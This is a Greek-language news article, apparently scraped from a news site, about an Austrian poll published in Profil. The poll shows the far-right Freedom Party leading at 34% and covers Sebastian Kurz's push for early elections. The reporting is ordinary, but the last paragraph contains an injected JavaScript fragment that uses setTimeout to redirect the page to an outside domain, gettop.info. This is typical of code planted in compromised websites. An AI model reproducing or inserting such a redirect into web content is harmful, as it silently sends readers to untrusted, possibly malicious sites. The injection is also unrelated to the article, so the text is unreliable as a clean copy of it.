Σταθερά στις δημοσκοπήσεις «μπροστά» η ακροδεξιά στην Αυστρία

0
3

 

Το αντιπολιτευόμενο ακροδεξιό εθνικιστικό Κόμμα των Ελευθέρων εξακολουθεί να προηγείται σταθερά στις δημοσκοπήσεις για τις επόμενες βουλευτικές εκλογές στην Αυστρία -που κανονικά πρόκειται να διεξαχθούν το φθινόπωρο του 2018– όπως διαπιστώνεται και στη νέα δημοσκόπηση, τα αποτελέσματα της οποίας θα δημοσιευθούν στο νέο τεύχος του αυστριακού εβδομαδιαίου περιοδικού «Προφίλ» που κυκλοφορεί τη Δευτέρα.

Σύμφωνα με τη δημοσκόπηση, σε περίπτωση εκλογών την ερχόμενη Κυριακή, το Κόμμα των Ελευθέρων θα συγκέντρωνε ποσοστό 34%, οι Σοσιαλδημοκράτες που ηγούνται της κυβέρνησης συνασπισμού με το συντηρητικό Λαϊκό Κόμμα θα βρίσκονταν στο 28 ο/ο, το Λαικό Κόμμα 18%, οι Πράσινοι 12% και το νεοφιλελεύθερο ΝΕΟΣ 6%.

Στην ίδια δημοσκόπηση, οι Αυστριακοί στην πλειονότητά τους, ποσοστό 51 ο/ο, τάσσονται κατά της πρόωρης διεξαγωγής των επόμενων βουλευτικών εκλογών, και παρά το γεγονός πως τρεις στους τέσσερις ερωτηθέντες (ποσοστό 74 ο/ο) είναι «ελάχιστα» ή «καθόλου» ευχαριστημένοι με το έργο της αυστριακής κυβέρνησης, μόνον σε ποσοστό 33 ο/ο υποστηρίζουν την επίσπευση των βουλευτικών εκλογών κατά έναν χρόνο και τη διεξαγωγή τους το φθινόπωρο του 2017.

Τη διεξαγωγή πρόωρων βουλευτικών εκλογών, που κανονικά πρόκειται να διεξαχθούν το φθινόπωρο του 2018 για να μην συμπέσουν με την Αυστριακή Προεδρία στην ΕΕ το δεύτερο εξάμηνο του 2018, υποστηρίζει ο Αυστριακός υπουργός Εξωτερικών Σεμπάστιαν Κουρτς του Λαικού Κόμματος.

Ο Σεμπάστιαν Κουρτς εμφανίζεται σε όλες τις δημοσκοπήσεις ως ο δημοφιλέστερος σήμερα πολιτικός στη χώρα, τόσο λόγω του νεαρού της ηλικίας του, μόλις 30 χρόνων, όσο και της λαϊκιστικής πολιτικής που πρεσβεύει σε διάφορα ζητήματα και κυρίως στο προσφυγικό, όπου επικρίνεται ότι συναγωνίζεται το αντιπολιτευόμενο ακροδεξιό εθνικιστικό Κόμμα των Ελευθέρων. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here